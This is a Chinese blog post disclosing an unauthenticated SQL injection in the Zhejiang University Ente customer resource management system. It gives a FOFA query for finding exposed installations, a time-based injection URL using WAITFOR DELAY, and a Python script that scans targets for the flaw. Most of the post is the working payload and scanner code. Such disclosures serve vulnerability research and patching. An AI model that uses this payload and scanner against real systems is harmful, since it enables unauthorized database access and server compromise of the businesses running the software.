浙大恩特客户资源管理系统 SQL注入漏洞(2023年11月发布)

漏洞简介

 浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。

漏洞等级高危
影响版本*
漏洞类型SQL注入

产品简介

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

网络测绘

FOFA:app="浙大恩特客户资源管理系统"

漏洞复现

手动验证POC

ip:port/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';WAITFOR+DELAY+'0:0:5'

python自动验证脚本

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
@Project :漏洞复现POC 
@File    :浙大恩特客户资源管理系统 SQL注入漏洞(2023年11月发布).py
@Author  :星之尘
@Date    :2023/11/24 11:44 
@脚本说明:
"""
import requests
from requests import Timeout
from urllib3.exceptions import InsecureRequestWarning
headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
        }

def scan(url,path1,path2):
    if not url.endswith("/"):
        url = url + '/'
        print(url)
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
    encodetext1 = url + path1
    encodetext2 = url +path2
    print(f"扫描目标: {url}")
    print("---------------------------------------------------")
    flag1 = 0
    flag2 = 0
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req1 = requests.get(encodetext1, headers=headers, verify=False, timeout=20)
        if req1.status_code == 200 and "0" in req1.text:
            flag1 = 1

        req2 = requests.get(encodetext2, headers=headers, verify=False, timeout=20)
        if req2.status_code == 200 and "0" not in req2.text:
            flag2 = 1
        if flag1 and flag2:
            print(f"[-] {url} 存在浙大恩特客户资源管理系统 SQL注入漏洞")
        else:
            print(f"[-] {url} 不存在浙大恩特客户资源管理系统 SQL注入漏洞")
    except Timeout:
        print(f"[!] 请求超时,跳过URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            print(f"[-] {url} 证书校验错误或者证书被拒绝")
        else:
            print(str(e))


if __name__ == "__main__":
    url = "your ip:port"
    path1 = "/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1"
    path2 = "/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1'"
    scan(url, path1,path2)

  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值